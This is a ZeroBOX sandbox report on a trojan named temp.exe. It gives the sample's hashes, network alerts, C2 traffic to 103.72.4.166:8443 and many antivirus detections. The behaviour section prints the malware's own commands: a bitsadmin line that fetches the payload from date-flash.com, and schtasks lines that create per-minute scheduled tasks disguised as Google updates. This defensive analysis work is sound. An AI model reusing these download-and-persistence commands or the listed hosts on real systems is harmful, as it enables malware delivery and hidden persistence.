Summary | ZeroBOX

temp.exe

PE64 PE File
Category: FILE
Machine: s1_win7_x6402
Started: June 21, 2021, 12:38 p.m.
Completed: June 21, 2021, 12:54 p.m.
Size 3.3MB
Type PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5 d89c813bf46d01f144a20592d371f0cc
SHA256 984265f2a1df743a585b3ed1aa138080dbc0e27c66d2472d10a66c916739556c
CRC32 8D191CE7
ssdeep 98304:T1yVjqcy7Vr5Xvdy3FBtCNG7Kmvh6BD1HRx2ZrCluDWtmf:ZyiTXY3mpmbpDYm
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)

Name Response Post-Analysis Lookup
date-flash.com 103.209.101.233

IP Address Status Action
103.209.101.233 Active Moloch
103.72.4.166 Active Moloch
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
61.135.169.121 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49805 -> 61.135.169.121:80 2024897 ET USER_AGENTS Go HTTP Client User-Agent Misc activity
TCP 192.168.56.102:49809 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49810 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49815 -> 103.209.101.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49821 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49823 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49824 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49825 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49826 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49828 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49829 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 103.209.101.233:443 -> 192.168.56.102:49816 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.102:49827 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49811 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49822 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 192.168.56.102:49830 -> 103.72.4.166:8443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
All twelve TLSv1 flows below run from 192.168.56.102 to 103.72.4.166:8443 and present the same certificate, whose Issuer and Subject fields are identical:
Issuer: C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn
Subject: C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn
Fingerprint: f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1
Source ports (one flow each): 49809, 49810, 49821, 49823, 49824, 49825, 49826, 49828, 49829, 49827, 49811, 49822

Time & API          Arguments                  Status  Return  Repeated
GetComputerNameA    computer_name: TEST22-PC   1       1       0
GetComputerNameW    computer_name: TEST22-PC   1       1       0
GetComputerNameW    computer_name: TEST22-PC   1       1       0
suspicious_features Connection to IP address suspicious_request GET http://61.135.169.121/
suspicious_features Connection to IP address suspicious_request GET https://103.72.4.166:8443/images/logo_max.png
suspicious_features Connection to IP address suspicious_request GET https://103.72.4.166:8443/images/logo.png
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w
request GET http://61.135.169.121/
request HEAD http://date-flash.com/temp.exe
request GET https://103.72.4.166:8443/images/logo_max.png
request GET https://103.72.4.166:8443/images/logo.png
request POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w
request POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w
Time & API Arguments Status Return Repeated
NtAllocateVirtualMemory  process_identifier: 9068, process_handle: 0xffffffffffffffff, base_address: 0x0000000027c10000, region_size: 4096, allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE), protection: 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass: 0, stack_pivoted: 0, heap_dep_bypass: 0  Status 1  Return 0  Repeated 0
NtAllocateVirtualMemory  process_identifier: 9068, process_handle: 0xffffffffffffffff, base_address: 0x0000000029d60000, region_size: 4194304, allocation_type: 4096 (MEM_COMMIT), protection: 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass: 0, stack_pivoted: 0, heap_dep_bypass: 0  Status 1  Return 0  Repeated 0
NtAllocateVirtualMemory  process_identifier: 9068, process_handle: 0xffffffffffffffff, base_address: 0x00000000286f0000, region_size: 311296, allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE), protection: 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass: 0, stack_pivoted: 0, heap_dep_bypass: 0  Status 1  Return 0  Repeated 0
cmdline C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
cmdline C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
cmdline schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
cmdline schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
section UPX1 (size_of_data 0x00350c00, virtual_address 0x0031c000, virtual_size 0x00351000, entropy 7.869545546306953) description A section with a high entropy has been found
entropy 0.999852746282 description Overall entropy of this PE file is high
section UPX0 description Section name indicates UPX
section UPX1 description Section name indicates UPX
section UPX2 description Section name indicates UPX
host 103.72.4.166
host 172.217.25.14
host 61.135.169.121
process temp.exe useragent
process temp.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
cmdline bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
Time & API Arguments Status Return Repeated
LdrGetProcedureAddress  module: ntdll, module_address: 0x00000000771c0000, function_name: wine_get_version, ordinal: 0, function_address: 0x000007feff017a50  Status -1073741511 (0xC0000139, STATUS_ENTRYPOINT_NOT_FOUND: the export does not exist outside Wine)  Repeated 0
Antivirus Result
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.37043105
FireEye Generic.mg.d89c813bf46d01f1
McAfee Artemis!D89C813BF46D
Cylance Unsafe
Zillya Trojan.Rozena.Win32.124132
Sangfor Riskware.Win32.Agent.ky
K7AntiVirus Trojan ( 0056c3071 )
Alibaba Backdoor:Win64/Shelma.da3ddcc0
K7GW Trojan ( 0056c3071 )
Cybereason malicious.4cb10c
Cyren W64/Trojan.MYRZ-7542
Symantec Trojan.Gen.2
ESET-NOD32 a variant of Win32/Rozena.AVL
APEX Malicious
Avast Win64:Trojan-gen
Kaspersky Trojan.Win64.Shelma.lbo
BitDefender Trojan.GenericKD.37043105
Paloalto generic.ml
Tencent Win64.Trojan.Shelma.Wstw
Ad-Aware Trojan.GenericKD.37043105
Sophos Mal/Generic-S
F-Secure Trojan.TR/Rozena.sdjwo
DrWeb Trojan.DownLoader39.52985
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R011C0WF821
McAfee-GW-Edition BehavesLike.Win64.Gravity.wc
Emsisoft Trojan.GenericKD.37043105 (B)
Ikarus Trojan.Win32.Rozena
Jiangmin Trojan.Shelma.ilj
MaxSecure Trojan.Malware.300983.susgen
Avira TR/Rozena.sdjwo
Antiy-AVL Trojan/Generic.ASBOL.C5E3
Gridinsoft Suspicious.XOR_Encoded.bot!yf
Microsoft Trojan:Win32/Glupteba!ml
ZoneAlarm Trojan.Win64.Shelma.lbo
GData Trojan.GenericKD.37043105
Cynet Malicious (score: 100)
ALYac Trojan.GenericKD.37043105
MAX malware (ai score=88)
VBA32 Trojan.Win64.Shelma
TrendMicro-HouseCall TROJ_GEN.R011C0WF821
Yandex Trojan.Shelma!1U+6LbCbUgU
Fortinet W64/Shelma.AVL!tr
AVG Win64:Trojan-gen
Panda Trj/CI.A
CrowdStrike win/malicious_confidence_80% (W)